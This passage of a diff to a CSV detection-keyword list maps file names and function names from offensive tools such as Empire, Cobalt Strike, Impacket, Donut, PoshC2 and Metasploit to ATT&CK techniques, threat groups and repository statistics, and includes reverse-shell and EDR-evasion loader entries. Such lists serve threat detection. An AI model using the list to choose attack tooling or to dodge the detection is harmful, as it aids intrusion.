singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*LLMNR.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*LLMNRSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*llsrpc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*lmhash*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*lnk-generate.py --host * --type ntlm --output *.lnk*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -13181,34 +13338,34 @@ "*Load-BeaconParameters*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Load-Bof(*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*loaddll64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*loader/inject.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*loader/inject_local.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader/inject.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader/inject_local.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*loader/loader/loader.c*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" -"*loader_exe_x64.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*loader_exe_x86.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*LoadEWSDLL*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*loadKirbiFile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*loadliba_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*loadliba_shell.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*loadliba_single_shell_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*loadmodule *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*loadmodume */modules/*.ps1**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Local:Get-DelegateType*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Local:Get-PEArchitecture*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Local:Get-ProcAddress*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*-local=0.0.0.0:4001*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*localexploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*loader_exe_x64.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader_exe_x86.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*LoadEWSDLL*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*loadKirbiFile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*loadliba_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadliba_shell.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadliba_single_shell_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadmodule *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*loadmodume */modules/*.ps1**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Local:Get-DelegateType*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Local:Get-PEArchitecture*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - 